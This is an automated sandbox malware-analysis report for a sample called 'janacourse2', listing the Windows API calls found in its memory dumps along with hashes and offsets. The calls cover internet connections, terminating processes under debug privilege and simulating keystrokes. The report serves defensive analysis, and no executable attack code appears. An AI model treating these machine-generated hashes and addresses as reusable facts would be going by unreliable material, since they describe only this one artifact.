                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                            • Opcode ID: 02ef89064dafa8935bbc43d99a2f7e0f2993f18100162b27e060c68605fad0d5
                                                                                                            • Instruction ID: 521e8f971c50e9a5a91dbf990b22d4a2406256d073403268618df643fe5d3edb
                                                                                                            • Opcode Fuzzy Hash: 02ef89064dafa8935bbc43d99a2f7e0f2993f18100162b27e060c68605fad0d5
                                                                                                            • Instruction Fuzzy Hash: A831A2B1500614AFF731DF688B84AAF7BFCEB49644B04895DE4CAD3200DB75DA448B60
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF3AAF,?,?,Bad directive syntax error,0104CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 010198BC
                                                                                                            • LoadStringW.USER32(00000000,?,00FF3AAF,?), ref: 010198C3
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 01019987
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                            • API String ID: 858772685-4153970271
                                                                                                            • Opcode ID: c25b52d974de9bb3b7bf9c3dfde163776ae84a4290d732f197d1941bf5f1edb7
                                                                                                            • Instruction ID: 28b0163a08152313af14063ee6056dee99eb8c968a0247a3dc14c6dc21a19c39
                                                                                                            • Opcode Fuzzy Hash: c25b52d974de9bb3b7bf9c3dfde163776ae84a4290d732f197d1941bf5f1edb7
                                                                                                            • Instruction Fuzzy Hash: 7121A031C4021EBBDF11AF91CC46EEE7B76BF18304F044469F655660A2EB7A9658DF10
                                                                                                            APIs
                                                                                                            • GetParent.USER32 ref: 010120AB
                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 010120C0
                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0101214D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                            • Opcode ID: 6e730aa9130c38932f496d9fcf5af03e1561afc4c66b2974cb628206411b3aba
                                                                                                            • Instruction ID: 6872161c5fefbdbff34f14ea41fc951f5e4823afac3801d4591210f27bde6b29
                                                                                                            • Opcode Fuzzy Hash: 6e730aa9130c38932f496d9fcf5af03e1561afc4c66b2974cb628206411b3aba
                                                                                                            • Instruction Fuzzy Hash: 02113D7E584306B6F6157524DC06CFA339CCB15324B30005AFB84A8096FA7D74015A18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f85c585f87b38ac7ec176d0d37f9ccd66126197b84f65351b33e1393e7fc1d75
                                                                                                            • Instruction ID: 48425190d77af11c2b32ca5bfc872d0380ac03574edf7ca640afa96e3f296b60
                                                                                                            • Opcode Fuzzy Hash: f85c585f87b38ac7ec176d0d37f9ccd66126197b84f65351b33e1393e7fc1d75
                                                                                                            • Instruction Fuzzy Hash: F6C12775D082C99FCB11EFAACC40BAD7BB1AF09320F044199F559A7392C7798941EB70
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282221369-0
                                                                                                            • Opcode ID: 25a0ebe6e278a9aaac0911378e6fbd98e0a7d59347e170ba4b19bb2693ed01ce
                                                                                                            • Instruction ID: fcbff18871cdf071d1e6cde6d1df71ba479c73c54c2dcd36b3343c1e9bc74cf9
                                                                                                            • Opcode Fuzzy Hash: 25a0ebe6e278a9aaac0911378e6fbd98e0a7d59347e170ba4b19bb2693ed01ce
                                                                                                            • Instruction Fuzzy Hash: CD613B72D043C46FDB21AF769C41A6D7BA5AF05320F04416EF98197246E73A9D02B7A1
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01045186
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 010451C7
                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 010451CD
                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 010451D1
                                                                                                              • Part of subcall function 01046FBA: DeleteObject.GDI32(00000000), ref: 01046FE6
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0104520D
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0104521A
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0104524D
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01045287
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01045296
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 3210457359-0
                                                                                                            • Opcode ID: aa06062ed3d3470cb30185c1c93e956d62179caef898f43797832abba3887389
                                                                                                            • Instruction ID: d21710cf8813dec88a680676ac0ac6a0b35a72157ebd40dc425dbf9de134eb8f
                                                                                                            • Opcode Fuzzy Hash: aa06062ed3d3470cb30185c1c93e956d62179caef898f43797832abba3887389
                                                                                                            • Instruction Fuzzy Hash: CF51B5B0A41209BFFF309E28CDCABD93BA5FF45321F148062F695962E1D775A580DB41
                                                                                                            APIs
                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 01006890
                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 010068A9
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 010068B9
                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 010068D1
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 010068F2
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FC8874,00000000,00000000,00000000,000000FF,00000000), ref: 01006901
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0100691E
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FC8874,00000000,00000000,00000000,000000FF,00000000), ref: 0100692D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268354404-0
                                                                                                            • Opcode ID: bd9ad2f3a676178766c0546e142e364066a1f0e181d4b939a533af1feb8ca0f4
                                                                                                            • Instruction ID: 8f7237f42310ca5ce58abd9a817eeee3cde6754f8147af49ae39fa26c6de8404
                                                                                                            • Opcode Fuzzy Hash: bd9ad2f3a676178766c0546e142e364066a1f0e181d4b939a533af1feb8ca0f4
                                                                                                            • Instruction Fuzzy Hash: 4F516DB0600206EFEB21CF24C986FAA7BB6FF84750F104518F986972D0DB76E951DB50
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102C182
                                                                                                            • GetLastError.KERNEL32 ref: 0102C195
                                                                                                            • SetEvent.KERNEL32(?), ref: 0102C1A9
                                                                                                              • Part of subcall function 0102C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102C272
                                                                                                              • Part of subcall function 0102C253: GetLastError.KERNEL32 ref: 0102C322
                                                                                                              • Part of subcall function 0102C253: SetEvent.KERNEL32(?), ref: 0102C336
                                                                                                              • Part of subcall function 0102C253: InternetCloseHandle.WININET(00000000), ref: 0102C341
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 337547030-0
                                                                                                            • Opcode ID: 232aedf45038018b8424d9fe5d94a60415572e710437672e3050c1fa87938896
                                                                                                            • Instruction ID: 640084dff43e9a1509816410361e1e9bb4bbc807213df7be13b10917ecf36c07
                                                                                                            • Opcode Fuzzy Hash: 232aedf45038018b8424d9fe5d94a60415572e710437672e3050c1fa87938896
                                                                                                            • Instruction Fuzzy Hash: AB31A0B5101651AFFB319FA9DB44A6EBBF8FF19200B00441DF99A83604DB36E414DBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010125BD
                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010125DB
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010125DF
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010125E9
                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01012601
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01012605
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0101260F
                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01012623
                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01012627
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2014098862-0
                                                                                                            • Opcode ID: accd2ec66694d5056f725708e02febd7befb873eae7f604a63714d180d40a7cb
                                                                                                            • Instruction ID: dc9f13e224ddc11458fa0f06c0b6388d65d3c85390d919aecb7b065fa3491c46
                                                                                                            • Opcode Fuzzy Hash: accd2ec66694d5056f725708e02febd7befb873eae7f604a63714d180d40a7cb
                                                                                                            • Instruction Fuzzy Hash: A301D871791210BBFB2066689DCAF593F59EB4EB11F500001F398AE0D8C9F624448BA9
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01011449,?,?,00000000), ref: 0101180C
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 01011813
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011449,?,?,00000000), ref: 01011828
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,01011449,?,?,00000000), ref: 01011830
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 01011833
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011449,?,?,00000000), ref: 01011843
                                                                                                            • GetCurrentProcess.KERNEL32(01011449,00000000,?,01011449,?,?,00000000), ref: 0101184B
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 0101184E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,01011874,00000000,00000000,00000000), ref: 01011868
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1957940570-0
                                                                                                            • Opcode ID: 72a351420129b8021671a6c52212de14f23487cf284d129d59264ab2377bb0e2
                                                                                                            • Instruction ID: ced7f5abe87cf8049183c6992050c25ae0887f4cc5b7670900e200c84eb09805
                                                                                                            • Opcode Fuzzy Hash: 72a351420129b8021671a6c52212de14f23487cf284d129d59264ab2377bb0e2
                                                                                                            • Instruction Fuzzy Hash: 6601BFB5241304BFF720ABB5DE8DF573B6CEB89B11F004411FA45DB195C6759800CB20
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0101D501
                                                                                                              • Part of subcall function 0101D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0101D50F
                                                                                                              • Part of subcall function 0101D4DC: CloseHandle.KERNEL32(00000000), ref: 0101D5DC
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103A16D
                                                                                                            • GetLastError.KERNEL32 ref: 0103A180
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103A1B3
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103A268
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0103A273
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103A2C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                            • Opcode ID: 58bf0a142bb3184e53ab1b3b7c6752b42eb0631f90ef3f215efef377c7d28de7
                                                                                                            • Instruction ID: 7efbd9fdcc761551708f6b1fb2cf14a92f82e6ceadb5430050687fcee52e1a6c
                                                                                                            • Opcode Fuzzy Hash: 58bf0a142bb3184e53ab1b3b7c6752b42eb0631f90ef3f215efef377c7d28de7
                                                                                                            • Instruction Fuzzy Hash: 4761B374204242DFE720DF19C494F6ABBE5AF84318F18848CE5E68B7A3C776E945CB91
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01043925
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0104393A
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01043954
                                                                                                            • _wcslen.LIBCMT ref: 01043999
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 010439C6
                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 010439F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                            • String ID: SysListView32
                                                                                                            • API String ID: 2147712094-78025650
                                                                                                            • Opcode ID: 9a5e152c003ed892af0bcfd5e53ccace4329f1f3e68e02d86003adab1eb94f09
                                                                                                            • Instruction ID: 4c3704be7119cf9d01c791312b8dcd4247625003295a869204a19c8873c31b7e
                                                                                                            • Opcode Fuzzy Hash: 9a5e152c003ed892af0bcfd5e53ccace4329f1f3e68e02d86003adab1eb94f09
                                                                                                            • Instruction Fuzzy Hash: DE4197B1A00319ABEF219F64CC85BEE7BA9FF08350F10156AF994EB281D7759950CB90
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101BCFD
                                                                                                            • IsMenu.USER32(00000000), ref: 0101BD1D
                                                                                                            • CreatePopupMenu.USER32 ref: 0101BD53
                                                                                                            • GetMenuItemCount.USER32(01185A40), ref: 0101BDA4
                                                                                                            • InsertMenuItemW.USER32(01185A40,?,00000001,00000030), ref: 0101BDCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                            • String ID: 0$2
                                                                                                            • API String ID: 93392585-3793063076
                                                                                                            • Opcode ID: 2f7bef85db78c9f44a797cfb0df7d3f38a429c97d19c8e7856b8a3a72adc8b78
                                                                                                            • Instruction ID: 7ffcce6f62ca112f8f4478ece3632145fe7639d5b7b8e87d4b77f64d61ced8be
                                                                                                            • Opcode Fuzzy Hash: 2f7bef85db78c9f44a797cfb0df7d3f38a429c97d19c8e7856b8a3a72adc8b78
                                                                                                            • Instruction Fuzzy Hash: BD5121706002059BEF28EFACC9C4BAEBFF4BF45314F544199E581DB288E7789941CB52
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0101C913
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
